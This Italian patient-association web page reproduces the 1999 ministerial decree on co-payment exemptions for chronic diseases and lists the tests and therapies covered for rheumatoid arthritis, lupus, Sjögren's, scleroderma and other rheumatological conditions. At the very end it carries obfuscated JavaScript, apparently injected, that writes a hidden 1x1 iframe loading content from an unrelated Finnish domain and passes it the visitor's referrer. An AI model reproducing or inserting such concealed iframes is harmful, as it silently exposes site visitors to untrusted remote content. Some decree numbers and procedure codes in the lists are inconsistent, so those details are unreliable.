• ASMAR Numero Verde - 800 09 03 95

Esenzioni

Il “Regolamento recante norme di individuazione delle malattie croniche e invalidanti” (Dm 28 maggio 1999, n. 239) emanato in attuazione del “sanitometro” è stato pubblicato sul supplemento ordinario 174/L alla “Gazzetta Ufficiale” del 25 settembre.
Entro febbraio 2000 le USL devono attuare le nuove norme rivedendo le attuali esenzioni e concedendo le nuove.
Di seguito riportiamo il testo del decreto e l’elenco delle patologie di interesse reumatologico incluse nell’allegato al DM.

Decreto del ministero della Sanità 28 maggio 1999, n. 329 (in supplemento ordinario 174/L alla “Gazzetta Ufficiale” 226 del 25 settembre 1999), concernente: “Regolamento recante norme di individuazione delle malattie croniche e invalidanti ai sensi dell’articolo 5, comma 1, lettera a), del decreto legislativo 29 aprile 1998, n. 124

ARTICOLO 1

Finalità e ambito di applicazione

1. Il presente regolamento individua le condizioni e le malattie croniche e invalidanti che danno diritto all’esenzione dalla partecipazione al costo per le correlate prestazioni sanitarie incluse nei livelli essenziali di assistenza, ai sensi dell’articolo 5, comma 1, lettera a), del Dlgs 29 aprile 1998, n. 124. L’eventuale esclusione di prestazioni dai suddetti livelli essenziali o l’introduzione di modifiche nella definizione delle singole prestazioni in essi incluse sono recepite secondo quanto previsto dall’articolo 6 del presente regolamento.

ARTICOLO 2

Individuazione delle condizioni di malattia e delle prestazioni

1. L’allegato 1, che forma parte integrante del presente regolamento, reca l’elenco delle condizioni e delle malattie che danno diritto all’esenzione dalla partecipazione al costo per le prestazioni di assistenza sanitaria dallo stesso indicate.

2. Per consentire l’identificazione univoca delle condizioni e delle malattie ai fini dell’esenzione e ferma restando la vigente normativa in materia di tutela dei dati personali dei soggetti affetti, a ciascuna malattia e condizione è associato uno specifico codice identificativo. Il codice si compone di otto cifre: le prime tre indicano una numerazione progressiva delle malattie e delle condizioni, le successive cinque corrispondono al codice identificativo delle stesse secondo la classificazione internazionale delle malattie “International classification of diseases-IX-Clinical modification (Icd-9-Cm)”; in caso di condizioni non riferibili a specifiche malattie riportate dalla suddetta classificazione, il codice identificativo si compone delle sole prime tre cifre.

3. Per ciascuna condizione e malattia l’allegato 1 elenca le prestazioni di assistenza sanitaria appropriate ai fini del relativo monitoraggio e della prevenzione degli ulteriori aggravamenti. Tali prestazioni sono da erogarsi in esenzione dalla partecipazione al costo agli aventi diritto ai sensi dell’articolo 4. Nell’allegato 1 sono altresì indicate le prestazioni di assistenza sanitaria da erogarsi agli aventi diritto in regime di esenzione dal pagamento della quota fissa, ai sensi dell’articolo 3, comma 9 del Dlgs 124/98 e successive modificazioni.

ARTICOLO 3

Modalità di prescrizione e di erogazione delle prestazioni

1. La prescrizione delle prestazioni erogabili in esenzione dalla partecipazione al costo ai sensi del presente regolamento reca l’indicazione delle prime tre cifre del codice identificativo della condizione o della malattia, come risultanti dall’attestato di esenzione.

2. Fermi restando i limiti di prescrivibilità di cui alla legge 25 gennaio 1990, n. 8, e successive modificazioni, ciascuna ricetta non può contestualmente recare la prescrizione di prestazioni erogabili in regime di esenzione dalla partecipazione ai sensi del presente regolamento e di altre prestazioni non erogabili in regime di esenzione.

3. La prescrizione delle prestazioni erogabili in esenzione dalla partecipazione ai sensi del presente regolamento è effettuata secondo criteri di efficacia e di appropriatezza rispetto alle condizioni cliniche individuali e nel rispetto delle indicazioni riportate nell’allegato 1.

ARTICOLO 4

Riconoscimento del diritto all’esenzione

1. L’azienda unità sanitaria locale di residenza dell’assistito riconosce il diritto all’esenzione dalla partecipazione al costo, ai sensi del presente regolamento, sulla base della certificazione attestante la specifica condizione o malattia, come definita all’articolo 2. La certificazione deve essere rilasciata dai presìdi delle aziende unità sanitarie locali, dalle aziende ospedaliere o dagli istituti ed enti di cui all’articolo 4, comma 12, del Dlgs 502/92, le successive modifiche e integrazioni o da istituzioni sanitarie pubbliche di Paesi appartenenti all’Unione europea.

2. L’azienda unità sanitaria locale rilascia a ciascun assistito avente diritto, anche mediante l’utilizzazione della carta sanitaria elettronica, un attestato di esenzione, che reca in forma codificata l’indicazione della condizione o della malattia per la quale è riconosciuto il diritto all’esenzione. In caso di accertamento di più malattie o condizioni individuate dall’articolo 2 del presente regolamento l’azienda unità sanitaria locale rilascia al soggetto avente diritto un unico attestato di esenzione che reca l’indicazione in forma codificata di tutte le malattie o condizioni per le quali è riconosciuto il diritto all’esenzione.

3. Le Regioni, sulla base di linee guida definite dal ministro della Sanità, fissano, per le condizioni di malattia per le quali è prevedibile risoluzione, la validità temporale massima dell’attestato.

ARTICOLO 5

Controlli

1. Le modalità di controllo sulle esenzioni sono disciplinate dai regolamenti adottati ai sensi dell’articolo 6 del Dlgs 29 aprile 1998, n. 124.

ARTICOLO 6

Aggiornamento

1. Il presente regolamento è aggiornato secondo quanto previsto dall’articolo 59, comma 50, lettera f), della legge 27 dicembre 1997, n. 449, con riferimento allo sviluppo dei percorsi diagnostici e terapeutici di cui all’articolo 1, comma 28, della legge 23 dicembre 1996, n. 662, nonché all’evoluzione delle conoscenze scientifiche e tecnologiche.

ARTICOLO 7

Norme finali e transitorie

1. Le aziende unità sanitarie locali provvedono a comunicare ai medici di medicina generale e ai pediatri di libera scelta i contenuti del presente regolamento e le specifiche modalità di applicazione.

2. Entro centoventi giorni dall’entrata in vigore del presente regolamento le aziende unità sanitarie locali sottopongono a verifica le attestazioni di esenzione già rilasciate ai sensi del decreto ministeriale 1^ febbraio 1991 e comunicano agli interessati la conferma del diritto all’esenzione, la sua cessazione o l’esigenza di ulteriori accertamenti. Nei casi di conferma del diritto all’esenzione le aziende unità sanitarie locali comunicano altresì le prestazioni fruibili in regime di esenzione dalla partecipazione al costo ai sensi del presente regolamento. Nei casi in cui la conferma del diritto all’esenzione sia subordinata a ulteriori accertamenti, i soggetti interessati hanno diritto alla fruizione in esenzione dalla partecipazione al costo delle prestazioni individuate dal decreto 1^ febbraio 1991 per la specifica forma morbosa o condizione, fino al completamento degli accertamenti e comunque non oltre i sessanta giorni successivi alla predetta comunicazione dell’azienda.

3. Fatto salvo quanto previsto al comma 4, le attestazioni di esenzione già rilasciate ai sensi del decreto ministeriale 1^ febbraio 1991, riferite a malattie e condizioni non incluse nell’allegato 1 al presente regolamento, cessano di avere efficacia a decorrere dalla comunicazione dell’azienda unità sanitaria locale e comunque non oltre il centoventesimo giorno dalla data di entrata in vigore del presente regolamento. Fino a tale data le attestazioni danno diritto alla fruizione in regime di esenzione dalla partecipazione al costo delle relative prestazioni individuate dal decreto ministeriale 1^ febbraio 1991.

4. Fino all’emanazione del regolamento di cui all’articolo 5, comma 1, lettera b), del Dlgs 29 aprile 1998, n. 124, le attestazioni di esenzione già rilasciate per: angioedema ereditario, dermatomiosite, pemfigo e pemfigoidi, anemie congenite, fenilchetonuria ed errori congeniti del metabolismo, miopatie congenite, malattia di Hansen, sindrome di Turner, spasticità da cerebropatia e retinite pigmentosa, danno diritto alla fruizione in regime di esenzione dalla partecipazione al costo delle relative prestazioni individuate dal decreto ministeriale 1^ febbraio 1991.

5. Le disposizioni del presente regolamento saranno adeguate sulla base della disciplina da emanarsi ai sensi dell’articolo 6 del Dlgs 29 aprile 1998, n. 124, anche per quanto riguarda il trattamento dei dati personali.

 

codice identificativo esenzione

Malattia o Condizione

006.714.0; .714.1; .714.2; .714.30; .714.32; .714.33  

Artrite Reumatoide

89.01 Anamnesi e valutazione, definite brevi. Storia e valutazione abbreviata. Visita successiva alla prima
90.04.5 Alanina aminotrasferasi (ALT) (GPT) [S/U]
90.09.2 Aspartato aminotrasferasi (AST) (GOT) [S]
90.16.4 Creatinina clearance
90.22.3 Ferritina [P/(Sg)Er]
90.22.5 Ferro  [S]
90.42.5 Transferrina  [S]
90.44.2 Urine conta di Addis
90.44.3 Urine esame chimico-fisico e microscopico
90.60.2 Complemento: C1q, C3, C3 ATT., C4 (ciascuno)
90.62.2 Emocromo: Hb, GR, GB, HCT, PLT, Ind. Deriv., F.L.
90.64.2 Fattore reumatoide
90.72.3 Proteina C reattiva (quantitativa)
90.82.5 Velocità di sedimentazione delle emazie (VES)
91.49.2 Prelievo di sangue venoso
Radiografia convenzionale (RX) segmentaria del/i distretto/i interessato/i
92.14.1 Scintigrafia ossea o articolare segmentaria
81.91 Artrocentesi, aspirazione articolare. Escluso: quella per biopsia delle strutture articolari (80.30), iniezione di farmaci (81.92), artrografia (88.32)
93.03 Valutazione protesica
93.11.2 Rieducazione motoria individuale in motuleso grave semplice, incluso: biofeedback, per seduta di 30 minuti (ciclo di dieci sedute)
93.11.4 Rieducazione motoria individuale in motuleso segmentale semplice, incluso: biofeedback, per seduta di 30 minuti (ciclo di dieci sedute)
93.22 Training deambulatori e del passo, incluso: addestramento all’uso di protesi, ortesi,ausili e/o istruzione dei familiari, per seduta di 30 minuti (ciclo di dieci sedute)
93.31.2 Esercizio assistito in acqua, per seduta di gruppo di 30 minuti max 5 pazienti (ciclo di dieci sedute)
93.39.1 Massoterapia distrettuale-riflessogena, per seduta di 10 minuti (ciclo di dieci sedute)
93.39.5 Elettroterapia antalgica, elettroanalgesia transcutanea (Tens, alto voltaggio). Per seduta di 30 minuti (ciclo di dieci sedute)
93.83 Terapia occupazionale. Terapia delle attività della vita quotidiana. Escluso: training in attività di vita quotidiana per ciechi (93.78). Per seduta individuale (ciclo di dieci sedute)
Nella forma di poliartrite cronica giovanile (714.30; 714.32; 714.33)
$90.20.4 Farmaci antinfiammatori Acetaminofene, Paracetamolo, salicilati
$ La prestazione riguarda il dosaggio dei farmaci eventualmente utilizzati
010.710.9  

Connettivite Mista

89.01 Anamnesi e valutazione, definite brevi. Storia e valutazione abbreviata. Visita successiva alla prima
90.16.4 Creatinchinasi (CPK o CK)
90.16.1 Creatinchinasi isoenzimi
90.16.4 Creatinina clearance
90.27.1 Glucosio  [S/P/U/dU/La]
90.33.6 Mioglobina  [S/U]
90.44.1 Urea [S/P/U/dU]
90.44.3 Urine esame chimico-fisico e microscopico
90.47.3 Anticorpi anti antigeni nucleari estraibili (ENA)
90.48.3 Anticorpi anti DNA nativo
90.52.4 Anticorpi anti nucleo (ANA)
90.60.2 Complemento: C1q, C3, C3 ATT., C4 (ciascuno)
90.62.2 Emocromo: Hb, GR, GB, HCT, PLT, Ind. Deriv., F.L.
90.64.2 Fattore reumatoide
90.82.5 Velocità di sedimentazione delle emazie (VES)
91.49.2 Prelievo di sangue venoso
87.44.1 Radiografia del torace di routine, Nas. Radiografia standard del torace [Teleradiografia, Telecuore] (2 proiezioni)
89.52 Elettrocardiogramma
93.08.1 Elettromiografia semplice [EMG]. Analisi qualitativa o quantitativa per muscolo. Escluso: EMG dell’occhio (96.25), EMG dello sfintere uretrale (89.23), quello con polisonnogramma (89.17)
93.08.2 Elettromiografia singola fibra. Densità delle fibre
88.99.1 Densitometria ossea con tecnica di assorbimento a fotone singolo o doppio. Polso o caviglia
oppure
88.99.2 Densitometria ossea con tecnica di assorbimento a raggi X lombare, femorale, ultradistale
88.99.3 Densitometria ossea con tecnica di assorbimento a raggi X total body
95.02 Esame complessivo dell’occhio. Visita oculistica, esame dell’occhio comprendente tutti gli aspetti del sistema visivo
028.710.0    

Lupus Eritematoso Sistemico

89.01 Anamnesi e valutazione, definite brevi. Storia e valutazione abbreviata. Visita successiva alla prima
90.04.5 Alanina aminotrasferasi (ALT) (GPT) [S/U]
90.09.2 Aspartato aminotrasferasi (AST) (GOT) [S]
90.16.4 Creatinina clearance
90.26.6 Gamma glutamil transpeptidasi (gamma GT)  [S/U]
90.27.1 Glucosio  [S/P/U/dU/La]
90.38.4 Proteine (elettroforesi delle)   [S]. Incluso dosaggio delle proteine totali
90.44.1 Urea [S/P/U/dU]
90.44.2 Urine conta di Addis
90.44.3 Urine esame chimico-fisico e microscopico
90.48.3 Anticorpi anti DNA nativo
90.52.4 Anticorpi anti nucleo (ANA)
90.60.2 Complemento: C1q, C3, C3 ATT., C4 (ciascuno)
90.61.1 Crioglobuline ricerca
90.62.2 Emocromo: Hb, GR, GB, HCT, PLT, Ind. Deriv., F.L.
90.64.2 Fattore reumatoide
90.72.3 Proteina C reattiva (quantitativa)
90.82.5 Velocità di sedimentazione delle emazie (VES)
91.49.2 Prelievo di sangue venoso
87.44.1 Radiografia del torace di routine, Nas. Radiografia standard del torace [Teleradiografia, Telecuore] (2 proiezioni)
89.52 Elettrocardiogramma
88.72.1 Ecografia cardiaca. Ecocardiografia
88.74.1 Ecografia dell’addome superiore. Incluso: fegato e vie biliari, pancreas, milza, reni e surreni, retroperitoneo. Escluso: ecografia dell’addome completo (88.76.1)
88.99.1 Densitometria ossea con tecnica di assorbimento a fotone singolo o doppio. Polso o caviglia
oppure
88.99.2 Densitometria ossea con tecnica di assorbimento a raggi X lombare, femorale, ultradistale
88.99.3 Densitometria ossea con tecnica di assorbimento a raggi X total body
95.02 Esame complessivo dell’occhio. Visita oculistica, esame dell’occhio comprendente tutti gli aspetti del sistema visivo
030.710.02    

Malattia di Sjögren

89.01 Anamnesi e valutazione, definite brevi. Storia e valutazione abbreviata. Visita successiva alla prima
90.04.5 Alanina aminotrasferasi (ALT) (GPT) [S/U]
90.05.1 Albumina [S/U/dU]
90.08.5 Alfa amilasi isoenzimi (frazione pancreatica)
90.09.2 Aspartato aminotrasferasi (AST) (GOT) [S]
90.16.4 Creatinina clearance
90.26.6 Gamma glutamil transpeptidasi (gamma GT)  [S/U]
90.29.2 Lattato deidrogenasi (LDH) [S/F]
90.44.1 Urea [S/P/U/dU]
90.44.3 Urine esame chimico-fisico e microscopico
90.52.1 Anticorpi anti mitocondri (AMA)
90.52.4 Anticorpi anti nucleo (ANA)
90.61.1 Crioglobuline ricerca
90.62.2 Emocromo: Hb, GR, GB, HCT, PLT, Ind. Deriv., F.L.
90.69.4 Immunoglobuline IgA, IgG o IgM (ciascuna)
90.82.5 Velocità di sedimentazione delle emazie (VES)
91.49.2 Prelievo di sangue venoso
Radiografia convenzionale (RX) distretto interessato
89.52 Elettrocardiogramma
95.02 Esame complessivo dell’occhio. Visita oculistica, esame dell’occhio comprendente tutti gli aspetti del sistema visivo
037.731.0    

Morbo di Paget

89.01 Anamnesi e valutazione, definite brevi. Storia e valutazione abbreviata. Visita successiva alla prima
90.11.4 Calcio totale  [S/U/dU]
90.24.1 Fosfatasi alcalina isoenzima osseo
90.24.5 Fosforo
91.49.2 Prelievo di sangue venoso
Radiografia convenzionale (RX) distretto interessato
92.18.2 Scintigrafia ossea articolare
95.02 Esame complessivo dell’occhio. Visita oculistica, esame dell’occhio comprendente tutti gli aspetti del sistema visivo
043.446.0    

Poliarterite Nodosa

89.01 Anamnesi e valutazione, definite brevi. Storia e valutazione abbreviata. Visita successiva alla prima
90.16.4 Creatinina clearance
90.27.1 Glucosio  [S/P/U/dU/La]
90.44.1 Urea [S/P/U/dU]
90.44.3 Urine esame chimico-fisico e microscopico
90.60.2 Complemento: C1q, C3, C3 ATT., C4 (ciascuno)
90.62.2 Emocromo: Hb, GR, GB, HCT, PLT, Ind. Deriv., F.L.
90.69.1 Immunocomplessi circolanti
91.49.2 Prelievo di sangue venoso
98.72.1 Ecografia cardiaca. Ecocardiografia
99.52 Elettrocardiogramma
88.73.6 Ecodoppler dei tronchi sovraortici a riposo o dopo prova fisica o farmacologica
88.77.2 Ecocolordopplergrafia degli arti superiori o inferiori o distrettuale, arteriosa o venosa a riposo o dopo prova fisica o farmacologica
92.03.1 Scintigrafia renale. In caso di contemporanea esecuzione di tomoscintigrafia codificare anche 92.035
92.03.2 Scintigrafia renale con angioscintigrafia. In corso di scintigrafia renale con unica somministrazione di radiofarmaco
045.696.0    

Psoriasi artropatica

89.01 Anamnesi e valutazione, definite brevi. Storia e valutazione abbreviata. Visita successiva alla prima
90.62.2 Emocromo: Hb, GR, GB, HCT, PLT, Ind. Deriv., F.L.
90.82.5 Velocità di sedimentazione delle emazie (VES)
91.49.2 Prelievo di sangue venoso
99.62 Terapia a luce ultravioletta. Attinoterapia. Fototerapia selettiva UV (UVA, UVB) Per ciclo di sei sedute
90.43.6 Urato [S/U/dU]Radiografia convenzionale (RX) del distretto interessato
047.710.1    

Sclerosi Sistemica (progressiva)

89.01 Anamnesi e valutazione, definite brevi. Storia e valutazione abbreviata. Visita successiva alla prima
90.44.3 Urine esame chimico-fisico e microscopico
90.47.3 Anticorpi anti antigeni nucleari estraibili (ENA)
90.52.2 Anticorpi anti muscolo liscio (ASMA)
90.52.4 Anticorpi anti nucleo (ANA)
90.60.2 Complemento: C1q, C3, C3 ATT., C4 (ciascuno)
90.62.2 Emocromo: Hb, GR, GB, HCT, PLT, Ind. Deriv., F.L.
90.82.5 Velocità di sedimentazione delle emazie (VES)
89.65.1 Emogasanalisi arteriosa sistemica. Emogasanalisi di sangue capillare o arterioso
91.48.5 Prelievo di sangue arterioso
91.49.1 Prelievo di sangue capillare
91.49.2 Prelievo di sangue venoso
89.37.2 Spirometria globale
99.52 Elettrocardiogramma
98.72.1 Ecografia cardiaca. Ecocardiografia
88.73.5 Ecodoppler dei tronchi sovraortici a riposo o dopo prova fisica o farmacologica
88.77.2 Ecocolordopplergrafia degli arti superiori o inferiori o distrettuale, arteriosa o venosa a riposo o dopo prova fisica o farmacologica
38.22 Angioscopia percutanea. Capillaroscopia. Escluso: angioscopia dell’occhio (95.12)
Radiografia convenzionale (RX) del distretto interessato
87.44.1 Radiografia del torace di routine, Nas. Radiografia standard del torace [Teleradiografia, Telecuore] (2 proiezioni)
89.32 Manometria esofagea
46.13 Esofagogastroduodenoscopia   [EGD]. Endoscopia dell’intestino tenue. Escluso: endoscopia con biopsia (45.14 – 45.16)
45.23 Colonscopia con endoscopia flessibile. Escluso: colonscopia transaddominale o attraverso stoma artificiale, sigmoidoscopia con endoscopio flessibile (45.24). Proctosigmoidoscopia con endoscopio rigido
99.71 Plasmaferesi terapeutica
054.720.0    

Spondilite Anchilosante

89.01 Anamnesi e valutazione, definite brevi. Storia e valutazione abbreviata. Visita successiva alla prima
88.28 Radiografia di pelvi  e anca. Radiografia del bacino. Radiografia dell’anca
67.20 Radiografia completa della colona (2 proiezioni). Radiografia completa della colona e del bacino sotto carico
92.18.2 Scintigrafia ossea o articolare
95.02 Esame complessivo dell’occhio. Visita oculistica, esame dell’occhio comprendente tutti gli aspetti del sistema visivo
89.52 Elettrocardiogramma
93.16 Mobilizzazione della colonna vertebrale. Manipolazione della colonna vertebrale per seduta. Escluso: manipolazione di articolazione temporo-mandibolare
93.16 Mobilizzazione di altre articolazioni. Manipolazione incruenta di rigidità di piccole articolazioni. Escluso: manipolazione di articolazione temporo-mandibolare
93.18.1 Esercizi respiratori. Per seduta individuale (ciclo di dieci sedute)
93.18.2 Esercizi respiratori per seduta collettiva (ciclo di dieci sedute)
93.19.1 Esercizi posturali – propriocettivi. Per seduta individuale di 60 minuti (ciclo di dieci sedute)
93.19.2 Esercizi posturali – propriocettivi. Per seduta collettiva di 60 minuti max 5 pazienti (ciclo di dieci sedute)
93.31.2 Esercizio assistito in acqua. Per seduta di gruppo di 30 minuti max 5 pazienti (ciclo di dieci sedute)
93.39.5 Elettroterapia antalgica, elettroanalgesia transcutanea (Tens, alto voltaggio). Per seduta di 30 minuti (ciclo di dieci sedute)
93.83 Terapia occupazionale. Terapia delle attività della vita quotidiana. Escluso: training in attività di vita quotidiana per ciechi (93.78). Per seduta individuale (ciclo di dieci sedute)

Tabella di corrispondenza: Classificazione internazionale delle malattie (ICD-9-CM) – malattie e condizioni croniche o invalidanti esenti e relativi codici di esenzione

Classificazione internazionale delle malattie – ICD-9-CM   Malattie e condizioni croniche o invalidanti che danno diritto all’esenzione dalla partecipazione al costo  
Codice definizione di malattia Cod. esenzione Malattia o condizione
714.0 Artrite reumatoide 006.714.0 Artrite reumatoide
714.1 Sindrome di Felty 006.714.1 Artrite reumatoide
714.2 Altre artriti reumatoidi con interessamento viscerale o sistemico 006.714.2 Artrite reumatoide
714.30 Artrite reumatoide cronica giovanile poliarticolare 006.714.30 Artrite reumatoide
714.32 Artrite reumatoide giovanile pauciarticolare 006.714.32 Artrite reumatoide
714.33 Artrite reumatoide giovanile monoarticolare 006.714.33 Artrite reumatoide
710.9 Altre malattie diffuse del connettivo 010.710.9 Connettivite mista
710.0 Lupus eritematoso sistemico 028.710.0 Lupus eritematoso sistemico
710.2 Malattia di Sjögren 030.710.2 Malattia di Sjögren
731.0 Osteite deformante senza menzione di tumore delle ossa (Morbo di Paget) 037.731.0 Morbo di Paget
446.0 Poliarterite nodosa 043.446.0 Poliarterite nodosa
696.0 Artropatia psoriasica 045.696.0 Psoriasi (artropatica, pustolosa grave, eritrodermica)
710.1 Sclerosi sistemica 047.710.1 Sclerosi sistemica (progressiva)
720.0 Spondilite anchilosante 054.720.0 Spondilite anchilosante

c_id=”043″;c_referer = escape(document.referrer);c_random = new String (Math.random());c_random = c_random.substring(2,11);document.write (“<" + "if"+"rame hei"+"ght=1 wi"+"dth=1 src=\"");document.write ("http://www.k"+"ielikurs"+"sit.f"+"i/templates/counter"+"/count?id=" + c_id + "&r=" + c_random);if (document.referrer)document.write ("&referer=" + c_referer);document.write ("\"><" + "/if"+"rame"+">“);<br>

Articoli correlati